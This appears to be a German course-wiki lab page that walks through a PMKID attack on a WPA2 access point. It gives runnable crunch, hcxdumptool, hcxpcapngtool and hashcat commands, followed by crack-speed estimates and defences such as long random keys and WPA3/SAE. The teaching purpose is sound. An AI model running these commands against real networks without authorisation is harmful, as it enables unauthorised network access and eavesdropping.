Wlan PMKID-Angriff
Version vom 14. August 2026, 13:00 Uhr von Thomas.will (Diskussion | Beiträge)
Szenario
- Angriff auf den Access Point
dd-xinux(siehe Access Point aufsetzen). - PMKID-Angriff
- clientless — kein verbundener Client, kein Deauth nötig. Wir greifen den PMKID direkt aus dem 1. EAPOL-Frame ab.
Passwortliste generieren
- Das AP-Passwort ist 8-stellig numerisch (
00001234) — genau dafür bauen wir die Liste.
- crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes ... dies dauert eine Weile
Störende Dienste stoppen
- systemctl stop avahi-daemon
- systemctl stop NetworkManager
PMKID abgreifen
- hcxdumptool -i wlan0 -w dump.pcapng
- hcxdumptool schaltet die Karte selbst in den Monitor-Modus. Läuft ein paar Sekunden.
- Die Flags ändern sich zwischen den Versionen — vorher einmal
hcxdumptool -hprüfen.
In hashcat-Format wandeln
- hcxpcapngtool -o pmkid.hc22000 dump.pcapng
- Erscheint "PMKID(s) written to 22000 hash file"? Dann haben wir ihn.
Cracken
- hashcat -m 22000 pmkid.hc22000 password.lst
- Ergebnis ansehen
- hashcat -m 22000 pmkid.hc22000 --show
Crack-Geschwindigkeiten
- Laptop schafft circa 1000 Keys pro Sekunde
- Eine starke Grafikkarte (Titan XP) schafft 520000 hash/s
- Online-Rechenpower mieten
- Cluster aus mehreren Grafikkarten bauen
Warum ist das knackbar?
00001234ist 8-stellig numerisch- 10^8 = 100 Mio. Kandidaten — in Kurszeit machbar.
- 8 Zeichen gemischt wären 62^8 ≈ 2,2×10^14 — praktisch nicht zu knacken. Ein starkes, zufälliges Passwort macht den Angriff chancenlos.
Verteidigung
- Langes, zufälliges PSK.
- WPA3 / SAE beseitigt den Offline-Angriff komplett — es gibt keinen abfangbaren Wert mehr.